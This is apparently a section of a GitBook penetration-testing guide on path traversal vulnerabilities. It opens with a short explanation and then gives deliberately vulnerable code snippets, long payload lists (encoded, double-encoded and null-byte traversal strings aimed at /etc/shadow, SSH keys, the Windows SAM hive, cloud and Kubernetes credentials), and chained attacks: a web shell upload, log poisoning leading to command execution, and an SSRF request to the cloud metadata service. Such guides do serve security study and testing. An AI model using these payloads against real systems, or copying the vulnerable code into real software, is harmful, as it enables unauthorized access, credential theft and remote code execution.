This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Path traversal

Before you start, it is very recommended to have basics of file system concepts (absolute vs. relative paths, path separators), operating system permission models, and how web servers and applications map URLs or input values to filesystem resources. This part may seem long, and its sections are built to be sequentially starting from the beginner level up to some advanced stuff, feel free to navigate to whatever topic you want. hack fun :)

Understanding Path Traversal

What is Path Traversal?

Path traversal (also known as directory traversal) is a security vulnerability that allows attackers to access files and directories outside of the intended directory structure. This occurs when applications use user-supplied input to construct file paths without proper validation or sanitization.

Vulnerable Code Example

// PHP vulnerable file reading
$file = $_GET['file'];
$content = file_get_contents('/var/www/html/uploads/' . $file);
echo $content;

Normal Request:

  • URL: GET /view.php?file=document.pdf

  • Path: /var/www/html/uploads/document.pdf

Malicious Request:

  • URL: GET /view.php?file=../../../etc/passwd

  • Path: /var/www/html/uploads/../../../etc/passwd/etc/passwd

How Path Traversal Works

Path traversal exploits the way operating systems handle relative path references. By using special directory references like ../ (parent directory) or absolute paths, attackers can navigate outside the intended directory structure to access sensitive files.

Common Path Traversal Sequences

Unix/Linux Systems:

  • ../ - Parent directory

  • ./ - Current directory

  • / - Root directory

  • ~ - Home directory

  • // - Alternative root (some systems)

Windows Systems:

  • ..\ - Parent directory

  • .\ - Current directory

  • C:\ - Drive root

  • \\ - UNC path prefix

  • / - Also works on Windows

Impact and Consequences

  • Sensitive File Access - Reading configuration files, passwords, keys

  • Source Code Disclosure - Accessing application source code

  • System Information Gathering - Reading system files, logs

  • Credential Harvesting - Accessing password files, tokens

  • Remote Code Execution - In combination with file upload vulnerabilities

  • Denial of Service - Accessing large files or system resources

Common Vulnerable Scenarios

File Download/View Functionality

Document Viewers:

// Vulnerable document viewer
$doc = $_GET['document'];
readfile('/var/www/docs/' . $doc);

Image Galleries:

// Vulnerable image display
$image = $_GET['img'];
header('Content-Type: image/jpeg');
readfile('/var/www/images/' . $image);

Log File Viewers:

// Vulnerable log viewer
$logfile = $_POST['log'];
echo file_get_contents('/var/log/app/' . $logfile);

File Upload Paths

Upload Directory Specification:

# Vulnerable upload path
import os
upload_dir = request.form['directory']
filename = request.files['file'].filename
filepath = os.path.join('/uploads/', upload_dir, filename)

Template File Access:

// Vulnerable template loading
String template = request.getParameter("template");
File templateFile = new File("/app/templates/" + template);

Include/Require Operations

Dynamic File Inclusion:

// Vulnerable include
$page = $_GET['page'];
include('/var/www/pages/' . $page . '.php');

Configuration File Loading:

# Vulnerable config loading
config_file = request.args.get('config')
with open(f'/app/config/{config_file}', 'r') as f:
    config = f.read()

Basic Path Traversal Techniques

Simple Directory Traversal

Basic Dot-Dot-Slash

Linux/Unix Traversal:

# Move up one directory
../etc/passwd

# Move up multiple directories  
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd

# Access system files
../../../etc/shadow
../../../root/.bash_history
../../../var/log/auth.log

Windows Traversal:

# Windows directory traversal
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\users\administrator\desktop\passwords.txt

Absolute Path Access

Direct Absolute Paths:

# Linux absolute paths
/etc/passwd
/etc/shadow
/root/.ssh/id_rsa
/var/log/apache2/access.log

# Windows absolute paths
C:\windows\system32\drivers\etc\hosts
C:\users\administrator\documents\passwords.txt
C:\inetpub\wwwroot\web.config

Mixed Traversal Techniques

Combining Relative and Absolute:

# Start with relative, end with absolute
../../../etc/passwd
../../../../../../etc/passwd

# Mixed separators (Windows)
../../../windows\system32\drivers\etc\hosts
..\..\..\windows/system32/drivers/etc/hosts

URL Encoding Bypass

Single URL Encoding

Basic URL Encoding:

# Encoded dot-dot-slash
%2e%2e%2f → ../
%2e%2e%5c → ..\

# Full path encoding
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

# Windows path encoding
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
→ ..\..\..\windows\system32\drivers\etc\hosts

Double URL Encoding

Double-Encoded Sequences:

# Double encoded dot-dot-slash
%252e%252e%252f → %2e%2e%2f → ../
%252e%252e%255c → %2e%2e%5c → ..\

# Double encoded paths
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
→ %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd

Unicode and UTF-8 Encoding

Unicode Variations:

# Unicode dot representations
\u002e\u002e\u002f → ../
\u002e\u002e\u005c → ..\

# UTF-8 encoded sequences
%c0%ae%c0%ae%c0%af → ../
%c1%9c%c1%9c%c1%af → ../

# Overlong UTF-8 encoding
%e0%80%ae%e0%80%ae%e0%80%af → ../

Filter Evasion Techniques

Null Byte Injection

Null Byte Termination:

# Null byte to bypass extension checks
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
../../../etc/passwd\0.jpg

# Multiple null bytes
../../../etc/passwd%00%00.txt

Case Variation

Mixed Case Paths:

# Case variations
../../../ETC/passwd
../../../Etc/Passwd
../../../etc/PASSWD

# Windows case insensitive
..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\Windows\System32\Drivers\Etc\Hosts

Alternative Separators

Different Path Separators:

# Forward slash on Windows
../../../windows/system32/drivers/etc/hosts

# Backslash on Unix (if processed)
..\..\..\etc\passwd

# Mixed separators
../../../windows\system32/drivers\etc/hosts
..\..\..\windows/system32\drivers/etc\hosts

Character Substitution

Alternative Character Representations:

# Backslash variations
.%5c.%5c.%5cetc%5cpasswd
.%2f.%2f.%2fetc%2fpasswd

# Alternative dot representations
%2e%2e/etc/passwd
%2E%2E/etc/passwd

# Space and tab characters
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd

Advanced Path Traversal Techniques

Deep Directory Traversal

Excessive Dot-Dot Sequences

Over-Traversal:

# More traversals than needed
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd

# Windows over-traversal
..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts

Nested Path Construction

Complex Path Building:

# Nested relative paths
dir1/../dir2/../../../etc/passwd
folder/../subfolder/../../etc/passwd
app/data/../../../etc/passwd

# Mixed absolute and relative
/var/www/../../../etc/passwd
C:\inetpub\..\..\..\windows\system32\drivers\etc\hosts

Application-Specific Bypasses

Framework-Specific Techniques

PHP Path Traversal:

# PHP stream wrappers
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# PHP input streams
php://input
php://stdin

Java Path Traversal:

# Java classpath access
../../../WEB-INF/classes/application.properties
../../../WEB-INF/web.xml
../../../META-INF/MANIFEST.MF

# JAR file access
jar:file:../../../app.jar!/config.properties

ASP.NET Path Traversal:

# ASP.NET configuration
../../../web.config
../../../global.asax
../../../bin/application.dll.config

# IIS specific
../../../inetpub/wwwroot/web.config

Operating System Specific

Linux-Specific Paths:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/version
../../../proc/meminfo

# System configuration
../../../etc/hostname
../../../etc/issue
../../../etc/resolv.conf
../../../etc/hosts

Windows-Specific Paths:

# Windows registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

# Windows system information
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\windows\system.ini

Filter Bypass Combinations

Multi-Encoding Techniques

Layered Encoding:

# URL + Unicode
%u002e%u002e%u002f → ../
%u002e%u002e%u005c → ..\

# Double URL + Case
%252E%252E%252F → %2E%2E%2F → ../
%252e%252e%252f → %2e%2e%2f → ../

# Triple encoding
%25252e%25252e%25252f → %252e%252e%252f → %2e%2e%2f → ../

Whitespace and Special Characters

Whitespace Injection:

# Spaces in paths
../ ../../../etc/passwd
..%20/..%20/..%20/etc/passwd

# Tab characters
..%09/..%09/..%09/etc/passwd

# Newlines and carriage returns
..%0a/..%0a/..%0a/etc/passwd
..%0d/..%0d/..%0d/etc/passwd

Path Normalization Bypass

Path Segment Manipulation:

# Redundant path segments
./../../etc/passwd
.././../etc/passwd
..//../../etc/passwd

# Self-referencing paths
./../.././../etc/passwd
././../../etc/passwd

Platform-Specific Exploitation

Linux/Unix Systems

System File Access

Password and Authentication:

# User account information
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/sudoers

# SSH keys and configuration
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../etc/ssh/sshd_config
../../../home/user/.ssh/id_rsa

System Configuration:

# Network configuration
../../../etc/hosts
../../../etc/resolv.conf
../../../etc/network/interfaces
../../../etc/hostname

# System information
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../etc/issue
../../../etc/os-release

Log Files:

# System logs
../../../var/log/syslog
../../../var/log/auth.log
../../../var/log/daemon.log
../../../var/log/kern.log

# Application logs
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/mysql/error.log

Application Files

Web Server Configuration:

# Apache configuration
../../../etc/apache2/apache2.conf
../../../etc/apache2/sites-enabled/000-default
../../../etc/httpd/conf/httpd.conf

# Nginx configuration
../../../etc/nginx/nginx.conf
../../../etc/nginx/sites-enabled/default

Database Configuration:

# MySQL configuration
../../../etc/mysql/my.cnf
../../../var/lib/mysql/mysql/user.MYD

# PostgreSQL configuration
../../../etc/postgresql/postgresql.conf
../../../var/lib/postgresql/data/pg_hba.conf

Windows Systems

System File Access

System Configuration:

# Windows system files
..\..\..\windows\win.ini
..\..\..\windows\system.ini
..\..\..\windows\system32\drivers\etc\hosts

# Registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam

User Data:

# User profiles
..\..\..\users\administrator\desktop\passwords.txt
..\..\..\users\administrator\documents\database.mdb
..\..\..\users\administrator\appdata\roaming\application\config.ini

# Application data
..\..\..\programdata\application\config.xml
..\..\..\program files\application\config\database.conf

IIS and ASP.NET Files

IIS Configuration:

# IIS configuration
..\..\..\inetpub\wwwroot\web.config
..\..\..\windows\system32\inetsrv\config\applicationhost.config

# ASP.NET files
..\..\..\inetpub\wwwroot\bin\application.dll.config
..\..\..\inetpub\wwwroot\global.asax
..\..\..\inetpub\wwwroot\app_data\database.mdf

Windows Services:

# Service configuration
..\..\..\windows\system32\config\software
..\..\..\program files\service\config.xml
..\..\..\programdata\service\settings.ini

Web Application Context Exploitation

File Download Vulnerabilities

Document Management Systems

Download Endpoint Exploitation:

# Document download
GET /download?file=../../../etc/passwd
GET /document/view?path=../../../etc/shadow
POST /file/get
Content-Type: application/x-www-form-urlencoded
filename=../../../var/log/auth.log

PDF/Document Viewers:

# PDF viewer exploitation
GET /pdf/view?document=../../../etc/passwd
GET /doc/display?file=../../../root/.ssh/id_rsa
GET /report/generate?template=../../../etc/mysql/my.cnf

Image and Media Galleries

Image Gallery Exploitation:

# Image viewer
GET /gallery/image?file=../../../etc/passwd
GET /media/view?img=../../../var/log/apache2/access.log

# Thumbnail generation
GET /thumb/generate?image=../../../etc/shadow
POST /image/resize
Content-Type: application/json
{"image": "../../../root/.bash_history"}

File Upload Vulnerabilities

Upload Path Manipulation

Directory Traversal in Upload:

# Upload to arbitrary location
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../var/www/html/shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

ZIP File Extraction (Zip Slip):

# Malicious ZIP with path traversal
# Create ZIP with entry: ../../../var/www/html/backdoor.php
# When extracted, places file outside intended directory

Template and Include Vulnerabilities

Template Engine Exploitation

Template Path Traversal:

# Template inclusion
GET /render?template=../../../etc/passwd
POST /template/process
Content-Type: application/json
{
  "template": "../../../var/log/auth.log",
  "data": {"user": "admin"}
}

Server-Side Include (SSI):

# SSI file inclusion
GET /page.shtml?include=../../../etc/passwd
GET /template.html?file=../../../proc/version

Advanced Exploitation Scenarios

Chained Attacks

Path Traversal to RCE

File Upload + Path Traversal:

# Step 1: Upload malicious file
POST /upload
filename=shell.php
content=<?php system($_GET['c']); ?>

# Step 2: Access via path traversal
GET /view?file=../uploads/shell.php&c=whoami

Log Poisoning + Path Traversal:

# Step 1: Poison log file via User-Agent
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

# Step 2: Include log file
GET /view?file=../../../var/log/apache2/access.log&cmd=id

Information Gathering Chain

Configuration Discovery:

# Step 1: Find application type
GET /view?file=../../../etc/issue

# Step 2: Target specific configs
GET /view?file=../../../etc/apache2/sites-enabled/000-default

# Step 3: Extract database credentials
GET /view?file=../../../var/www/html/config.php

# Step 4: Access database files
GET /view?file=../../../var/lib/mysql/mysql/user.MYD

Container and Cloud Exploitation

Docker Container Escape

Container File Access:

# Container metadata
../../../proc/self/cgroup
../../../proc/self/mountinfo

# Docker socket access
../../../var/run/docker.sock

# Host filesystem access (if mounted)
../../../host/etc/passwd
../../../host/root/.ssh/id_rsa

Kubernetes Pod Escape

Service Account Access:

# Service account token
../../../var/run/secrets/kubernetes.io/serviceaccount/token

# Kubernetes API access
../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Pod metadata
../../../proc/self/environ

Cloud Metadata Access

AWS Instance Metadata:

# Via SSRF through path traversal
GET /proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Local file with cloud credentials
../../../home/ec2-user/.aws/credentials
../../../root/.aws/config

Language and Framework Specific

PHP Applications

PHP-Specific Vulnerabilities

PHP Stream Wrappers:

# PHP filter wrapper
php://filter/convert.base64-encode/resource=../../../etc/passwd

# PHP input wrapper
php://input

# Data wrapper
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# Expect wrapper (if enabled)
expect://whoami

Include/Require Exploitation:

// Vulnerable PHP include
<?php
$page = $_GET['page'];
include($page . '.php');
?>

// Exploitation
GET /index.php?page=../../../etc/passwd%00
GET /index.php?page=php://filter/convert.base64-encode/resource=config

PHP Configuration Files

Common PHP Targets:

# PHP configuration
../../../etc/php/7.4/apache2/php.ini
../../../usr/local/etc/php/php.ini

# Application configs
../../../var/www/html/wp-config.php
../../../var/www/html/config.php
../../../var/www/html/.env

Java Applications

Java-Specific Paths

Java Application Files:

# Spring Boot configuration
../../../application.properties
../../../application.yml
../../../config/application.properties

# Web application files
../../../WEB-INF/web.xml
../../../WEB-INF/classes/application.properties
../../../META-INF/MANIFEST.MF

Class Path Traversal:

# Java class files
../../../WEB-INF/classes/com/company/app/Config.class
../../../WEB-INF/lib/application.jar

# Log4j configuration
../../../WEB-INF/classes/log4j.properties
../../../WEB-INF/classes/log4j2.xml

Python Applications

Python-Specific Files

Python Application Files:

# Python configuration
../../../settings.py
../../../config.py
../../../requirements.txt

# Django specific
../../../manage.py
../../../settings/local.py
../../../static/admin/

# Flask specific
../../../app.py
../../../config/development.py

Python Virtual Environments

Virtual Environment Access:

# Virtual environment files
../../../venv/pyvenv.cfg
../../../env/lib/python3.8/site-packages/

# Python cache files
../../../__pycache__/settings.cpython-38.pyc

Node.js Applications

Node.js Specific Files

Node.js Configuration:

# Package and configuration files
../../../package.json
../../../package-lock.json
../../../.env
../../../config/default.json

# Node modules
../../../node_modules/express/package.json
../../../node_modules/.bin/

Process and Environment:

# Process information
../../../proc/self/environ
../../../proc/self/cmdline

# Node.js specific
../../../.npmrc
../../../yarn.lock
PreviousXML injection (XXE - XML External Entity)NextFile upload vulnerabilities

Last updated

Was this helpful?